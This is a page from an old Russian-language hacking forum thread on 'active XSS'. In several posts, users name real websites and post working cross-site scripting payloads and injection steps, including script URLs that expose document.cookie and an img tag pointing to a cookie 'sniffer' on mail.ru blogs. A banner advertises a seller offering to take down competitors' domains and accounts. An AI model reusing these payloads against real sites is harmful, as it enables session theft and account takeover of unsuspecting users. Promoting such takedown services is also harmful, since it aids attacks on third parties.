УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Активные Xss

Страница 10 из 54

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#91

21.10.2007, 04:37

SSSetuPPP

Познающий

Регистрация: 22.01.2007

Сообщений: 32

Провел на форуме:
214445

Репутация: 0

Цитата:

Сообщение от freddi

mail.ru yandex.ru rambler.ru

отправляем сообщение на почту и прикладываем файлик txt со скриптом. если открыть его в ие то вылезет алерт, должно сработать и в опере(не хочу ставить чтобы проверять), а в фф не работает.
минус: все что вы напишете в этот файл отобразится в письме(кроме рамблера)

на мейле прикрыли. куки норм приходят только на рамблер.

И на рамблере тоже не работает...

#92

21.10.2007, 14:20

freddi

Постоянный

Регистрация: 05.07.2006

Сообщений: 458

Провел на форуме:
2943499

Репутация: 807

Цитата:

Сообщение от SSSetuPPP

И на рамблере тоже не работает...

работает, в ие по крайней мере точно.

Цитата:

Сообщение от SSSetuPPP

Где находится это поле "Image web address:"?

http://img30.picoodle.com/img/img30/...3m_424a366.jpg

#93

23.10.2007, 15:58

SSSetuPPP

Познающий

Регистрация: 22.01.2007

Сообщений: 32

Провел на форуме:
214445

Репутация: 0

Цитата:

Сообщение от freddi

работает, в ие по крайней мере точно.

Слушай у меня не работает, может я чё не так делаю? Не мог бы ты пободробней объяснить?

#94

25.10.2007, 23:13

BlackCats

Постоянный

Регистрация: 01.02.2006

Сообщений: 970

Провел на форуме:
9254548

Репутация: 1942

cyberfight.ru популярный ресурс - 7000-8000 хостов в день.
пример:

Цитата:

http://www.cyberfight.ru/site/profile/108747

при регистрации в кач-ве логина указываеш скрипт, потом пр просмотре твоего профля - он выполница.

#95

26.10.2007, 22:30

ЛифчиС5СВ

Постоянный

Регистрация: 09.03.2007

Сообщений: 323

Провел на форуме:
1552920

Репутация: 369

Цитата:

Сообщение от BlackCats

cyberfight.ru популярный ресурс - 7000-8000 хостов в день.
пример:

при регистрации в кач-ве логина указываеш скрипт, потом пр просмотре твоего профля - он выполница.

Добавлю, что там еще пассивная ХСС c куками. Уж0с

Код:

http://www.cyberfight.ru/info/search/?qry=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&Search.x=0&Search.y=0

#96

26.10.2007, 23:12

BlackCats

Постоянный

Регистрация: 01.02.2006

Сообщений: 970

Провел на форуме:
9254548

Репутация: 1942

пассивные я тоже находил, но эта тема называется активные xss

#97

27.10.2007, 17:12

BlackCats

Постоянный

Регистрация: 01.02.2006

Сообщений: 970

Провел на форуме:
9254548

Репутация: 1942

http://livechat.boldchat.com/aid/6278237534205176796/bc.chat
active XSS в поле your name

#98

27.10.2007, 17:18

Fugitif

Постоянный

Регистрация: 23.09.2007

Сообщений: 416

Провел на форуме:
1781065

Репутация: 869

Paradox Security Systems

Код:

http://paradox-security.ru/index.php?action=%22%3E%3Cscript%3Ealert(%22XSS%20BY%20Fugitif%22)%3C/script%3E

edit:

Blogus.ru

Код:

http://www.blogus.ru/tagposts.aspx?id=%22%3E%3Cscript%3Ealert(%22XSS%20BY%20Fugitif%22)%3C/script%3E

edit:

Moto.ru

Код:

http://www.moto.ru/ubbthreads/showprofile.php?Cat=%22%3E%3Cscript%3Ealert(%22XSS%20BY%20Fugitif%22)%3C/script%3E

Последний раз редактировалось Fugitif; 27.10.2007 в 18:07..

#99

29.10.2007, 05:27

Dreel

Новичок

Регистрация: 23.08.2007

Сообщений: 3

Провел на форуме:
49747

Репутация: 13

Отправить сообщение для Dreel с помощью AIM

Fugitif, и где там активность????
_http://job.properm.ru/
_http://auto.properm.ru/
Заполняем вакансию, резюме, объявление, и в поле ФИО пишем

Код:

Иванов Иван <script>alert(/ xss /)</script>

Заходим на сайт _http://www.virtualflowers.ru/abook.php
Добавить адресата - в каментах

Код:

<script>alert(/ GraBBerZ.com /)</script>

#100

29.10.2007, 14:50

freddi

Постоянный

Регистрация: 05.07.2006

Сообщений: 458

Провел на форуме:
2943499

Репутация: 807

mail.ru

в блогах пишем сообщение, там можно использовать разные теги, например имейдж

<img src="адрес_снифера">

так все прекрасно работает, но куки не отошлешь тк стоит фильтрация "+", я как ни старался не обошел ее.

зы пользуясь случаем хочу передать привет админам мейла.

Страница 10 из 54

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Xss для новичков	Micr0b	Уязвимости	79	06.07.2018 22:05
Xss	bx_N	Forum for discussion of ANTICHAT	7	11.03.2007 19:17
mylivepage.ru активные XSS	__XT__	Уязвимости	3	23.12.2006 14:31

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход